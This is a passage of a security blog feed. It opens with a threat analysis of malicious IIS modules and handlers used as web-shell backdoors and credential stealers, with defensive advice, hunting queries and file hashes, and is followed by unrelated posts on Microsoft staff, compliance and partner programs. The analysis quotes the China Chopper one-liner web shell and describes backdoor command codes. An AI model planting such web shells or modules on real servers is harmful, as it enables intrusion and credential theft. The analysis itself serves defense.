Web shells like China Chopper have been widely used in numerous targeted attacks. As China Chopper’s usage increased over the years, so did the detections. As a result, the attackers evolved and added IIS module-based versions of these web shells that maintain the same functionality. The module uses the same eval() technique that’s used in the script version for running the code. While most antivirus solutions would detect the one-liner web shell, such as < %@page language=js%><%eval(request.item(<password>),”unsafe”);%>, embedding the same code in an IIS module generates lower detection rates.

In the module version, the attacker-initiated POST request contains the code along with the arguments in parameters z1 and z2, like the script-based version.

China Chopper code snippet
Figure 13. China chopper IIS module – version 1
Attacker's POST request
Figure 14. Attacker generated POST data – version 1

In a different version, the module has the backdoor logic hardcoded inside the DLL and only waits for parameters z1 and z2. The parameter kfaero has the command exposed as sequential alphabets from ‘A-Q’.

China Chopper code snippet
Figure 15. China chopper IIS module – version 2

Like the script version, the IIS module has similar capabilities, such as listing and creating directories, downloading and uploading files, running queries using SQL adaptors, and running commands. To run commands, the attacker-initiated POST request contains the command “M” along with the arguments.

Attacker's POST request
Figure 16. An example of an attacker generated POST data – version 2

Antsword is another popular web shell widely used in various targeted attacks. Custom IIS modules inspired from the web shell’s code have been observed in the wild, which include similar architecture and capabilities. Interesting new features of these malicious modules include fileless execution of C# code and remote access via TCP socket connection.

Antsword module code snippet
Figure 17. Antsword IIS module code snippet

Based on the request, the module can take one of the two code paths. In case of /server-status, a socket connection is initiated from values in the custom header Lhposzrp.

Command Description
FSoaij7_03Ip3QuzbIhvuilKIsoM9a48DTkvQKdwtKNA Socket connection
8CDztbQb4fsQeU5AAuBs9OmRokoyFJ7F5Z Close connection
31FKvk8VDcqZMA3iAq3944wjg Send data
TU_LDzOsv Receive data

For any other URL, the module follows a China Chopper-style architecture of commands, ranging from “A” through “R”. The additional “R” command allows the attackers to run C# code reflectively.

Command to invoke code reflectively
Figure 18. Command “R” to invoke code reflectively

Open-source variants

GitHub projects on creating backdoors for IIS have been available for some time now. Though mostly shared to educate the red team community, threat actors have also taken interest and lifted code from these projects. Using a public project that has been actively leveraged by attackers as an example, the original code includes the following capabilities:

Command Implementation
cmd Run command via cmd.exe /c
powershell Run powershell via RunspaceFactory.CreateRunspace()
shellcode Inject supplied shellcode into userinit.exe

In this case, the in-the-wild variants change the cookie names, keeping the rest of the code intact:

Comparison of public GitHub project's code (left) to the attacker's modified code (right)
Figure 19. Side to side comparison of code from an open-source project (left) and code used by attackers (right)

On supplying a whoami command to the backdoor, the generated cookie has the following format:

Cookie: BDUSS=P6zUsk/1xJyW4PPufWsx5w==

The backdoor responds with an AES encrypted blob wrapped in base64. The decoded output has the following format:

Server's decoded response
Figure 20. Decoded response from the server

IIS handlers

As mentioned earlier, IIS handlers have the same visibility as modules into the request pipeline. Handlers can be configured to respond to certain extensions or requests. To create a managed IIS handler, the code must implement the IHttpHandler interface. The IHttpHandler interface has one method and one property with the following signatures:

IIS handler skeleton
Figure 21. IIS handler skeleton

Handlers can be registered by directly editing the web.config file or using the appcmd utility. The handler config takes a few important fields like path, which specifies the URL or extensions the handler should respond to, and verb, which specifies the HTTP request type. In the example below, the handler only responds to image requests ending with a .gif extension:

Attacker's malicious entry
Figure 22. Malicious web.config entry

The handler is visible in the IIS manager application once successfully installed:

Installed handler visible in IIS manager app
Figure 23. Installed handler visible in the list

Most of the handlers analyzed were relatively simple, only including the capability to run commands:

Commands running via cmd.exe
Figure 24. IIS handler running commands via cmd.exe

Interestingly, the response Content-Type is set to image/gif or image/jpeg, which presents a default image when browsing the image URL with the output hidden in <pre> tags. A possible reason for this could be to bypass network inspection since image files are generally considered non-malicious and are filtered and identified based on extensions.

Credential stealers

This subset of modules monitors sign-in patterns in outgoing requests and dumps extracted credentials in an encrypted format. The stolen credentials allow the attackers to remain persistent in the environment, even if the primary backdoor is detected.  

The modules monitor for specific requests to determine a sign-in activity, such as /auth.owa default URL for OWA application. On inspecting the request, the module dumps the credentials in a .dat file. The contents are encrypted using XOR with a hardcoded value and wrapped with base64 encoding. The below image depicts a decoded sample output:

Decrypted entry sample
Figure 25. Sample decrypted entry
Backdoor code
Figure 26. Backdoor looking for OWA sign-in URL

In another variant, the module looks for common placeholder variables for passing credentials used in different ASP.Net applications. The dumped credentials are AES encrypted and wrapped with Base64 encoding, located in %programdata%\log.txt.

Backdoor code
Figure 27. Backdoor looking for common credential placeholder variables
Decrypted entry sample
Figure 28. Sample decrypted entry

Improving defenses against server compromise

As we expect to observe more attacks using IIS backdoors, organizations must ensure to follow security practices to help defend their servers.

Apply the latest security updates

Identify and remediate vulnerabilities or misconfigurations impacting servers. Deploy the latest security updates, especially for server components like Exchange as soon as they become available. Use Microsoft Defender Vulnerability Management to audit these servers regularly for vulnerabilities, misconfigurations, and suspicious activity.

Keep antivirus and other protections enabled

It’s critical to protect servers with Windows antivirus software and other security solutions like firewall protection and MFA. Turn on cloud-delivered protection and automatic sample submission in Microsoft Defender Antivirus to use artificial intelligence and machine learning to quickly identify and stop new and unknown threats. Use attack surface reduction rules to automatically block behaviors like credential theft and suspicious use of PsExec and Windows Management Instrumentation (WMI). Turn on tamper protection features to prevent attackers from stopping security services.

If you are worried that these security controls will affect performance or disrupt operations, engage with IT professionals to help determine the true impact of these settings. Security teams and IT professionals should collaborate on applying mitigations and appropriate settings.

Review sensitive roles and groups

Review highly privileged groups like Administrators, Remote Desktop Users, and Enterprise Admins. Attackers add accounts to these groups to gain foothold on a server. Regularly review these groups for suspicious additions or removal. To identify Exchange-specific anomalies, review the list of users in sensitive roles such as mailbox import export and Organization Management using the Get-ManagementRoleAssignment cmdlet in Exchange PowerShell.

Restrict access

Practice the principle of least-privilege and maintain good credential hygiene. Avoid the use of domain-wide, admin-level service accounts. Enforce strong randomized, just-in-time local administrator passwords and enable MFA. Use tools like Microsoft Defender for Identity’s Local Administrator Password Solution (LAPS).

Place access control list restrictions on virtual directories in IIS. Also, remove the presence of on-premises Exchange servers when only used for recipient management in Exchange Hybrid environments.

Prioritize alerts

The distinctive patterns of server compromise aid in detecting malicious behaviors and inform security operations teams to quickly respond to the initial stages of compromise. Pay attention to and immediately investigate alerts indicating suspicious activities on servers. Catching attacks in the exploratory phase, the period in which attackers spend several days exploring the environment after gaining access, is key. Prioritize alerts related to processes such as net.execmd.exe originating from w3wp.exe in general.

Inspect config file and bin folder

Regularly inspect web.config of your target application and ApplicationHost.config to identify any suspicious additions, such as a handler for image files—which is suspicious itself, if not outright malicious. Also, regularly scan installed paths like the application’s bin directory and default GAC location. Regularly inspecting the list of installed modules using the appcmd.exe or gacutil.exe utilities is also advisable.

Hardik Suri
Microsoft 365 Defender Research Team


Microsoft Defender Antivirus detects these threats and related behaviors as the following malware:

  • Backdoor:MSIL/SuspIISModule.G!gen
  • Backdoor:MSIL/SuspIISModule.H!gen
  • Backdoor:MSIL/SuspIISModule.K!gen
  • Backdoor:MSIL/OWAStealer.B
  • Backdoor:MSIL/OWAStealer.C
  • Behavior:Win32/SuspGacInstall.B

Endpoint detection and response (EDR)

  • Suspicious IIS AppCmd Usage

Hunting queries

To locate malicious activity related to suspicious IIS module registration, run the following queries:

Suspicious IIS module registration

| where ProcessCommandLine has “appcmd.exe add module”
| where InitiatingProcessParentFileName == “w3wp.exe”
| where InitiatingProcessFileName == “powershell.exe”
|where ProcessCommandLine has ” system.enterpriseservices.internal.publish”
| where InitiatingProcessParentFileName == “w3wp.exe”
|where ProcessCommandLine has ” \\gacutil.exe /I”
| where InitiatingProcessParentFileName == “w3wp.exe”

Indicators of compromise (IOCs)

File name SHA-256
HttpCompress.dll  4446f5fce13dd376ebcad8a78f057c0662880fdff7fe2b51706cb5a2253aa569
HttpSessionModule.dll  1d5681ff4e2bc0134981e1c62ce70506eb0b6619c27ae384552fe3bdc904205c
RewriterHttpModule.dll c5c39dd5c3c3253fffdd8fee796be3a9361f4bfa1e0341f021fba3dafcab9739
HttpManageMoudle.dll 95721eedcf165cd74607f8a339d395b1234ff930408a46c37fa7822ddddceb80
IIS_backdoor.dll e352ebd81a0d50da9b7148cf14897d66fd894e88eda53e897baa77b3cc21bd8a
FinanceSvcModel.dll 5da41d312f1b4068afabb87e40ad6de211fa59513deb4b94148c0abde5ee3bd5
App_Web_system_web.ashx.dll 290f8c0ce754078e27be3ed2ee6eff95c4e10b71690e25bbcf452481a4e09b9d
App_Web_error.ashx.dll 2996064437621bfecd159a3f71166e8c6468225e1c0189238068118deeabaa3d

The post Malicious IIS extensions quietly open persistent backdoors into servers appeared first on Microsoft Security Blog.

How one Microsoft product manager acts as champion for identity security

July 26th, 2022 No comments

A technology career embodies the ancient Roman saying that “luck happens when preparation meets opportunity.” Few industries are as dynamic, fast-paced, or intense as technology. With so many challenges to solve, opportunities are everywhere, but as I’ve learned myself through the years, the best opportunities are not just the ones right in front of you, they’re the ones you create.

Nitika Gupta, a Microsoft Principal Product Manager who leads the team responsible for enterprise admin capabilities for identity security, personifies the spirit of preparing for, seizing, and creating opportunities, which she has done not only for herself but also for the people around her. Since joining Microsoft in 2013, she has never stayed complacent. Nitika is always learning, growing, and honing her expertise in identity, product management, and leadership so she’ll be ready to take on the next big challenge.

So many game-changing technologies started with a napkin, sticky note, or whiteboard, but no great idea ever comes to fruition without a champion determined to steward it from concept to working feature. Nitika has championed some of our most groundbreaking technologies, including Conditional Access, the heart and soul of Microsoft’s Zero Trust architecture. Her hard work and optimism have made her a go-to person on my team for new initiatives. I feel so fortunate to work with Nitika, and I hope her story inspires you to prepare for, seize, and create opportunities in your own career.

Nitika’s interview with Microsoft Partner Director of Identity Security Alex Weinert has been edited for clarity and length. You’ll find a video snippet embedded in the interview so you can hear Nitika talk about her work philosophy.

Alex: Tell us, Nitika, how you got to Microsoft.

Nitika: I grew up in India in a small city. I did really well in school in general, but I did really well in computer science courses, too. Naturally, I picked computer science as I headed to college in Singapore.

My last year at the National University of Singapore, I spent most of my time applying to companies in the United States that would sponsor my work visa. Since I was studying computer engineering, and all my internships were coding, I applied as a developer. During my second interview with Microsoft, the interviewer told me about a new role called program manager, which is now called product manager.

They didn’t hire program managers from overseas as much back then—only developers. The gentleman who interviewed me put in a good word for me, so the program management team in Redmond decided to interview me.

We ended up doing phone calls at odd times because I was sitting in Singapore and the interviewers were in Redmond. They ended up giving me an offer to join Microsoft as a program manager in the identity team. I was like, “This is exactly what I want,” since I wanted to relocate to the United States. Program management was new but sounded cool and I told myself if I didn’t like it, I could go back to being a developer. I had no clue what identity was, but that’s how I ended up in identity at Microsoft.

Alex: Incredible. What was your first project as a new product manager at Microsoft?

Nitika: I worked on resiliency of Microsoft Azure Active Directory (Azure AD) services. I started with the core authentication stack, but I wanted to work on something more customer-facing, where I could talk to customers firsthand. My manager happily agreed, so I started working on multifactor authentication (MFA). That’s when I met you, Alex. I still remember the whiteboarding session we did on Conditional Access in your office, which we converted into mockups for a road show. We ended up building it, and now it’s the most used feature in Azure AD today.

Alex: Back then, I was responsible for Latin America, and we did a customer tour there. On the last day, you and I had a conversation. You said you wanted to do bigger things. And I challenged you to go figure out what problem you wanted to solve and just solve it. Can you talk a bit about that?

Nitika: Yeah. Back then, I was working on admin experiences for identity security and was really spread too thin. I had a broad scope but didn’t feel like I was owning a business. I remember writing down my thoughts about what I was doing, what I liked and didn’t. I came to you, we had a chat, and you challenged me to think about what “my ideal role” looked like. And that’s a question I now often use to challenge my team when they want to make a change because as a manager, I’m very committed to giving them opportunities that align best with their passions and interests.

In any event, I came up with security adoption.

Alex: You engaged the field, the small and medium-sized business (SMB) market. You found partner teams and went super creative in a very entrepreneurial way—all as an individual contributor. You created what is now security defaults and the identity secure score, as well as the big MFA adoption push. Then another opportunity came your way. Tell us about that.

Nitika: It was an opportunity I didn’t see coming. A lot of opportunities have come from getting to a point where I wanted more challenge, but in this case, I was having a blast, right? I got to create my own role. I was driving this mission for adoption of security best practices. I was very jazzed about it, and suddenly you and our leadership surprised me with an opportunity to drive a compete feature on the cloud provisioning team. My career in identity until that point had been about the cloud. Once you get your identities in the cloud, how can we help you protect those identities with MFA, Conditional Access, identity protection, and adoption of security best practices? But I had little knowledge of the on-premises world, and this new job was all about bringing identities from on-premises to the cloud.

So for me, it was a very tough decision because I felt like I did not have the expertise and the experience I would need. Other people had been working on sync and provisioning scenarios for years, so I needed to leverage their expertise to build the best possible product for our customers. We had this ambitious goal of delivering a preview in six months or so, which ended up being closer to a year. It was a fun journey working on a zero-to-one product where I had zero expertise to start with, but we still made it happen.

Alex: Then we tapped you on the shoulder again.

Nitika: When you and Alex Simons offered me the opportunity to lead the Conditional Access, MFA, and security adoption team, I said, “This is out of my league.” I was very unsure and took a few days to accept, even though it was a dream job for me. But thanks to the support from you and Alex, I ended up taking the opportunity. I started leading the team right when we all began working from home at the start of the pandemic. It’s been very gratifying to support the team in such uncertain times and yet deliver the business outcomes.

Alex: One of the things I love is the way it came full circle, from that whiteboard session where we were just kind of like, “Hey, wouldn’t it be cool if…,” to something that’s now the heart of our Zero Trust strategy at Microsoft. You’re leading a 15-person team in three regions as we’re making huge bets on supporting the Cybersecurity Executive Order from the United States government, phish-proof credentials, the protection of machine accounts, and MFA adoption. Watching you grow and become such a strong leader has been awesome.

Nitika: Thank you. It’s about protecting our customers. That gets me excited every day I come to work. And it’s really the team, right? Every day, I think it’s about making sure everyone on the team can do their best work and achieve their career goals.

Learn more

Learn more about Microsoft identity and access management.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post How one Microsoft product manager acts as champion for identity security appeared first on Microsoft Security Blog.

Discover 5 lessons Microsoft has learned about compliance management

July 25th, 2022 No comments

Compliance management is a complex process—one that gets increasingly more complicated the larger an organization grows. Microsoft knows this firsthand, not only because of our experience providing Security and Compliance solutions to customers but also because of the global reach and responsibility for maintaining compliance with a hefty number of regional and industry-specific regulations. Another thing Microsoft has learned along this journey is that the route is significantly smoother with an inclusive mindset and digital tools to ease the way.

In the new world of hybrid work, regulatory compliance has become a board-level directive. Local and global regulations dictate how to manage, store, and transmit data, making compliance more critical than ever before. However, to adhere to these regulatory standards, risks need to be identified and mitigated, and data needs to be governed according to policy. Embarking on this journey will provide additional valuable outcomes, like:

  • Providing you with fast access to requested data in the event of an external or internal investigation or legal action.
  • Protecting company data as the workplace evolves is especially important given the growing use of personal devices for work and the increase in employees accessing company networks from outside the physical office for some or most of their week.
  • Acting as good stewards—Chief Information Security Officers (CISOs) feel a sense of duty to protect their employees, partners, and customers to the best of their ability.

Microsoft’s compliance journey has given us insights and best practices that we can share with other organizations determined to strengthen their compliance management practices. Planning for the unexpected events that inevitably occur means aligning your people, processes, and technology. Here are five things we’ve learned along our compliance path—and stories of what’s worked for customers.

Assess your compliance posture

It’s difficult, if not impossible, to know if you’re headed in the right direction without knowing your current position. So, where do you start? Compliance management has gone from a nice to have to a must-have for organizations, which have huge a incentive to strengthen their compliance management practices. Keeping track of all the regulations they’re responsible for, however, can be challenging, especially for those companies in regulated industries, like financial services or healthcare. Maintaining a good compliance posture can help you avoid penalties, negative publicity, fines, and financial losses. Given how quickly regulations change, this can be a big challenge. And manually tracking compliance issues in spreadsheets often isn’t sufficient. As a first step, we recommend assessing the current state of your compliance with a visual tool that helps measure where you are today, and allows you to track your collective progress over time.

Broaden your idea of compliance

When people hear the term “compliance,” many instantly think about regulatory compliance. Understandably so, because regulations like the California Consumer Protection Act (CCPA) and General Data Protection Regulation (GDPR) receive a lot of press and attention. But as mentioned earlier, compliance goes way beyond regulations.

Compliance management can even lead to innovation. Customers tell us they feel free to adapt the way they operate in response to customer trends. Visionary Wealth Advisors, a financial management firm in the United States, wanted to allow customers to communicate with the company via text messaging but needed to manage that data securely for compliance reasons. Visionary Wealth Advisors was able to maximize security and compliance with Microsoft Purview Data Lifecycle Management and CellTrust SL2.

“A central pain point is that the client doesn’t understand the regulatory environment that we operate in,” said Ryan Barke, Chief Compliance Officer and General Counsel, Visionary Wealth Advsiors. “They just want to communicate with their financial advisor, and the financial advisor wants to communicate with the client. We can have a policy that says, advisors, you’re prohibited from text messaging with your clients but we cannot control the other end of that communication.”

Involve everyone

Data breaches are accelerating—climbing 68 percent in 2021, costing an average of USD4.24 million each.1 Insider leaks of sensitive data, intellectual property (IP) theft, and fraud can all detrimentally impact a company. So, too, can regulatory violations, but CISOs may be so focused on data protection that data compliance doesn’t get as much attention. What we have learned on our journey is that compliance isn’t a CISO’s burden to bear alone. Multiple Microsoft executives were involved in meeting compliance regulations and obligations. People across Microsoft had to have a hand in compliance to drive the process.

Involving multiple leaders makes sense given how people throughout an organization will benefit from what strong compliance management makes possible. The City of Marion in Australia deployed Microsoft Purview Records Management to better manage the data collected from the 90 services it provides. As a result, city staff has become more engaged with the process of creating and handling information. They can organize themselves and their workflows in Microsoft Teams, set up SharePoint sites, create and link information, create their own Power BI reports, configure workflows, and connect varied information much easier.

“It helps our small team get lots of stuff done, and we don’t need to worry so much about compliance anymore,” said Karlheins Sohl, Information Management Team Leader, City of Marion. “We can trust the system to help take care of that, while we’re freed to focus on the quality of information and the service we provide to the City of Marion staff.”

Discover data and identify risks

In the event of legal action, a merger or acquisition, or an internal or external investigation, technology solutions can help you more efficiently find the relevant data you need. With the proliferation of data, that’s more important than ever.

The sheer volume of data can make this challenging. Technology solutions like Microsoft Purview eDiscovery can help you save time and money on tracking down data.

Through a solution like Microsoft Purview Communication Compliance, organizations can reduce risks related to regulatory compliance obligations.  

Simplify and automate compliance

Effective technology solutions have a wonderful way of simplifying complex processes—and often the workdays of those responsible for managing those processes. Multiple solution providers can complicate already challenging compliance processes and result in a fragmented, inefficient approach. Choosing a comprehensive solution, like Microsoft Purview, can help by continuously monitoring for compliance changes and automating the update process.

Texas-based Frost Bank must follow numerous banking regulations and employees recognize the importance of complying with them—“Compliance is like drinking coffee in the morning,” says Edward Contreras, CISO, Frost Bank. Keeping up with all of those regulations proved challenging before adopting Microsoft Purview Compliance Manager, which updates daily, adding at least 200 updates from more than 1,000 regulatory bodies and enabling the bank to create detailed reports for regulators and auditors.

“Compliance Manager took the mystery out of regulatory compliance for us,” said Glenn McClellan, Endpoint Architect, Frost Bank. “The solution provides improvement actions, excerpts from relevant regulations, and overall, made managing compliance really easy and actionable.”

Explore Microsoft Purview

Effective compliance and risk management are extremely important, and are possible. Microsoft is here to help if you’re looking to simplify your compliance management with technology solutions.

Microsoft Purview is a comprehensive set of compliance and risk management solutions that help organizations govern, protect, and manage data, and improve your company’s risk and compliance posture. These solutions include Microsoft Purview eDiscovery, which helps you discover, preserve, collect, process, cull, and analyze your data in one place; Microsoft Purview Compliance Manager, which helps you simplify compliance and reduce risk; and Microsoft Purview Communication Compliance, which helps foster compliant communications across corporate mediums. We’d love to offer support on your journey.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

1Cost of a Data Breach Report 2021, Ponemon Institute, IBM. 2021.

The post Discover 5 lessons Microsoft has learned about compliance management appeared first on Microsoft Security Blog.

How Microsoft Purview and Priva support the partner ecosystem

July 20th, 2022 No comments

Today, many enterprise organizations are multicloud and multiplatform. Critical enterprise data is located across clouds and platforms, requiring security and compliance no matter where it lives. To solve the complexity that comes with these environments, organizations have invested in multiple point solutions, which in turn can make it hard for them to manage the fragmented compliance and risk posture covering their entire data estate. To help organizations meet today’s global compliance and risk requirements across their multicloud, multiplatform data environments, we announced Microsoft Purview in April 2022.

Three columns with text explaining that Microsoft Purview helps customers understand and govern data across their environment, safeguard their data across clouds, apps, and devices, and improve data risk and compliance posture with regulatory requirements.

Microsoft Purview is a portfolio of solutions for information protection, data governance, risk management, and compliance that enables organizations to effectively manage their data all from one place. It provides enhanced visibility that organizations can leverage across their environment to help close gaps that can lead to data exposure, simplify tasks through automation, stay up-to-date with regulatory requirements, and keep their most important asset—their data—secured. Partners play a critical role in helping customers manage their entire data estate. We’ve invested in connectors, APIs, and extensibility to support partners and help customers manage their data. 

Microsoft Purview product announcements

Today, we are excited to announce the general availability of the new Microsoft Graph APIs for Microsoft Purview eDiscovery. With the new Microsoft Purview eDiscovery APIs, organizations can leverage automation to streamline common, repetitive workflows that require a lot of manual effort in the product experience.

Customers and partners find automation and extensibility of eDiscovery workflows critically important because of the ability to reduce the potential for human error in highly sensitive workflows. For example, efficiently managing repeatable, defensible processes is critical to managing risk for organizations that have significant requirements for litigation and investigation.

Here are some of the ways partners are building value-added solutions and services using our Microsoft Purview eDiscovery APIs:

Relativity integrates with Microsoft Purview eDiscovery (Premium)

Relativity, Microsoft’s Security ISV of the Year for 2022, shared that “using the right tools to put business’s data into action is essential for many eDiscovery and compliance use cases. RelativityOne integration with Microsoft Purview eDiscovery significantly expedites the eDiscovery review process, minimizes data copies across multiple platforms, facilitates third-party collaboration, and ultimately reduces costs while the data remains secure within the Microsoft cloud. Now is the time to benefit from RelativityOne’s integration with Microsoft’s Purview’s eDiscovery platform,” said Chris Izsak, Strategic Partnerships GTM Manager, Relativity.

Relativity's RelOne user experience showing integration with Microsoft Purview eDiscovery.

BDO’s Athenagy integrates with Microsoft Purview eDiscovery

BDO’s Athenagy creates dashboards using both Microsoft Purview eDiscovery and RelativityOne. Their “patent-pending business intelligence dashboards now provide legal, IT, and compliance professionals a whole new level of data transparency and cost containment by surfacing up critical insights inside both Microsoft Purview eDiscovery—using the newly released Microsoft Purview eDiscovery APIs—and RelativityOne tied to legal hold, collect, preservation, processing, and review for every investigation, compliance, and litigation matter,” said Daniel Gold, inventor of Athenagy and managing director of E-Discovery Managed Services, BDO.

Athenagy's user experience showing data from Microsoft Purview eDiscovery.

Epiq Global integrates with Microsoft Purview eDiscovery

Epiq leverages Microsoft Purview eDiscovery APIs to create an end-to-end eDiscovery workflow. “Utilizing the Microsoft Purview eDiscovery APIs allows us to automate within Microsoft Purview to use inputs from our customer’s existing legal hold system of record to seamlessly orchestrate an end-to-end workflow including sending hold notices, preserving data in place, and performing searches, collections, and exports. When updates are made in the system of record, the changes are propagated directly to the appropriate piece of eDiscovery to ensure parity. An automated solution eliminates human error, reduces administrative costs, and ensures that eDiscovery processes are in sync with your issuance of legal holds,” said Jon Kessler, Vice President of Information Governance Services, Epiq.

Lighthouse integrates with Microsoft Purview eDiscovery

Lighthouse uses Microsoft Purview eDiscovery APIs to create “a rich and intuitive user experience, taking advantage of custodian data mapping, in-place preservation, modern attachment retrieval, and advanced culling. Our automation and orchestration solution is designed to improve user efficacy with job failure oversight, completion notification, and automatic provisioning and management of Azure storage containers. Clients embracing this solution benefit from automation and orchestration to fully leverage Purview Premium eDiscovery’s apps securely and at scale,” said John Collins, Director of Advisory Services, Lighthouse (winner of the Compliance and Privacy Trailblazer award for 2022).

Growth opportunities for partners

The opportunity for our partners who invest in the Microsoft compliance ecosystem continues to grow. Our partners are finding success by building value-added solutions and services around Microsoft’s solutions at an increasing rate. For example, partners are creating solutions that connect disparate information repositories for enterprise-wide compliance initiatives.

Microsoft partners continue to have the ability to participate in our successful go-to-market program, the partner build-intent workshops. These workshops cover the Microsoft Security portfolio and help drive customer success with Microsoft products and partner services through prescriptive scenarios that address the top pain points of our customers. These workshops have been updated to give partners the ability to uncover additional opportunities leveraging the most up-to-date tools and solutions. Discover all our partner workshops and get started with unlocking opportunities and value with your customers.

How Microsoft supports the partner ecosystem

The Microsoft Purview platform enables our customers and partners to adapt, extend, integrate, and automate information protection, data governance, risk management, and compliance scenarios. These capabilities are enabled through our investments in these key building blocks:

Microsoft Purview APIs: We are constantly expanding our API surface area. With our investments in Microsoft Graph APIs we currently enabling extensibility scenarios across Purview Information Protection, Purview Data Lifecycle Management, Purview eDiscovery, Purview Audit, and more. Partners are using these APIs to build value-added services and solve unique customer scenarios.

Microsoft Purview Data Connectors: To enable high-fidelity data ingestion—including sources such as Slack, Zoom, and WhatsApp, we have partnered with Veritas, TeleMessage, 17a-4, and CellTrust to deliver more than 70 ready-to-use connectors. Our extensibility push provides more opportunities for partners to join this connector ecosystem.

Microsoft Purview Data Catalog: Microsoft Purview’s unified data governance capabilities help with managing on-premises, multicloud, and software as a service (SaaS) data. Microsoft Purview Data Catalog supports multicloud data classification and covers data repositories such as Azure Cosmos DB and Amazon Web Services (AWS) S3 buckets. There is also an Atlas Kafka API that facilitates extensibility scenarios for our partners and customers.

Microsoft Purview Compliance Manager: With universal templates, we help partners and customers extend compliance management capabilities to non-Microsoft environments.

Power Automate integrations: Microsoft Purview solutions including Microsoft Purview Data Lifecycle Management, Insider Risk Management, and Communication Compliance have built-in Power Automate integrations. This offers unique opportunities for our partners and customers to streamline and automate workflows and business scenarios.

Another way Microsoft supports the ecosystem is through the Microsoft Intelligent Security Association (MISA). MISA is an ecosystem of independent software vendors and managed service providers that have integrated their products and services with Microsoft’s security technology. Over the last year, MISA has extended its qualifying products to include a broad range of Microsoft Purview and Microsoft Priva products. MISA offers members co-marketing benefits and the opportunity to deepen their technology integrations and relationship within the Microsoft security ecosystem. MISA offers members co-marketing benefits and the opportunity to deepen their technology integrations and relationship within the Microsoft security ecosystem.

Partner with Microsoft Purview

Here are a few ways that partners can join the Microsoft Purview ecosystem:

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post How Microsoft Purview and Priva support the partner ecosystem appeared first on Microsoft Security Blog.

Congratulations to the Top MSRC 2022 Q2 Security Researchers!

July 19th, 2022 No comments

Congratulations to all the researchers recognized in this quarter’s Microsoft Researcher Recognition Program leaderboard! Thank you to everyone for your hard work and continued partnership to secure customers. The top three researchers of the 2022 Q2 Security Researcher Leaderboard are: Yuki Chen, Zhiyi Zhang, and William Söderberg! Check out the full list of researchers recognized …

Congratulations to the Top MSRC 2022 Q2 Security Researchers! Read More »

How Microsoft Security partners are helping customers do more with less

July 19th, 2022 No comments

There has never been a greater demand for specialized cybersecurity expertise—or a greater opportunity for our partners to support our customers with new services and solutions. Over the last year, the permanent shift to hybrid work has empowered businesses to be remote and mobile. Increased adoption of public and private clouds has unlocked innovation, agility, and scale. At the same time, ransomware grew 105 percent over the past year and continues to become more sophisticated.1 The global cybersecurity talent shortage is now 2.72 million, and economic uncertainty has put the spotlight on extracting the highest possible return on investments.2

This week, as we join our partners at Microsoft Inspire, much of our conversation is focused on how, together, we can help our customers prioritize their security initiatives while getting the most out of the solutions they already have.

Security services are a critical need for the year ahead

Every year I am so energized by the expertise and creativity of our partners. Much of what we learn comes from them, so we commissioned a Total Economic Impact™ from Forrester Consulting to better understand the high-level trends driving their security, compliance, and identity opportunities. It’s incredible to see that the Microsoft Security partner opportunity grew 21 percent year-over-year across the board in Microsoft 365 security, cloud security, compliance, and identity:

  • With the shift to hybrid work, workplace security has seen the most growth. It’s exciting to see that customers are taking advantage of the expanded security capabilities we’ve added to Microsoft 365, and enlisting partners to help them protect frontline workers, implement data discovery for Microsoft Teams, and activate more Microsoft 365 workloads securely. With many organizations struggling to staff their in-house security teams, partners are creating and delivering managed services built on top of Microsoft Sentinel for security information and event management (SIEM) and extended detection and response (XDR), as well as management, monitoring, and remediation across Microsoft 365.
  • There’s also an incredible demand for cloud security services—particularly multicloud. The rapid shift to cloud services has created an ever-evolving threat landscape, driving the need to better protect cloud resources, workloads, and applications. Without the expertise or resources to do that, customers are looking to partners to help with secure cloud migrations, managed services for the security operations center (SOC), and security management of all levels of cloud-based infrastructure.
  • Compliance-related managed services are the newest and fastest-growing area for most partners. More partners are starting to expand their general security services to include compliance, typically starting with information protection, communications governance, and insider risk, which are natural extensions of security practices. A trend we’re seeing is an increase in very large information protection deployment opportunities, as well as governance advisory services, which are central to the successful adoption of Microsoft compliance solutions.
  • As the foundation for all the previously mentioned points, our identity solutions are also fueling significant partner growth. Securing access for every identity—human and non-human—is critical in today’s connected world. Partners are capitalizing on these investments with repeatable identity-specific security solutions, off-the-shelf connectors, and managed services. Identity-first implementations of Zero Trust continue to be key areas of interest for security decision-makers, and partners serve a critical role in collaborating on plans, priorities, and architecture decisions.

Microsoft Security partners are expanding their existing offerings and creating new offerings in all these areas, packaging their unique experience, expertise, and IP for effective and efficient service delivery. Security deployment, advisory, solutions development, and managed services are needed now more than ever. In fact, within the USD247 billion cybersecurity market, security services spending is projected to reach USD77 billion by the end of 2022.3

Optimization through consolidation

Given the breadth of challenges our customers are facing, and recent economic headwinds, many organizations are looking to consolidate their security portfolios to optimize costs and reduce complexity. In fact, 78 percent of chief information security officers (CISOs) have 16 or more tools in their cybersecurity vendor portfolio, and according to Gartner®, “most organizations recognize vendor consolidation as an avenue for more efficient security, with 80 [percent] executing or interested in a strategy for this.”4

Microsoft integrates more than 50 different categories across security, compliance, identity, device management, and privacy—and most customers save 60 percent on average by leveraging Microsoft’s comprehensive security solutions compared to a multi-vendor strategy. All Microsoft Security product families work together as one comprehensive solution across clouds and across platforms, helping customers to reduce tool sprawl, maximize value out of what they already have, and reduce complexity. With recent announcements of Microsoft Entra and Microsoft Purview, we’ve also aligned our product portfolio with how our customers view the totality of their security challenges.

Radar chart listing six Microsoft product lines: Microsoft Defender, Microsoft Sentinel, Microsoft Entra, Microsoft Purview, Microsoft Priva, and Microsoft Endpoint Manager.

Consolidation isn’t just about tools—the lines between security workloads are blurring as well. Virtually every customer scenario includes elements of secure infrastructure, threat detection and response, identity management and secure access, compliance, and privacy—in fact, 90 percent of the Fortune 100 companies use four or more of these solutions. Our partners agree, and many are moving beyond their core specialty to provide a wider range of services to customers, creating new revenue streams and expanding their expertise as a result.

Maximizing the value of current investments

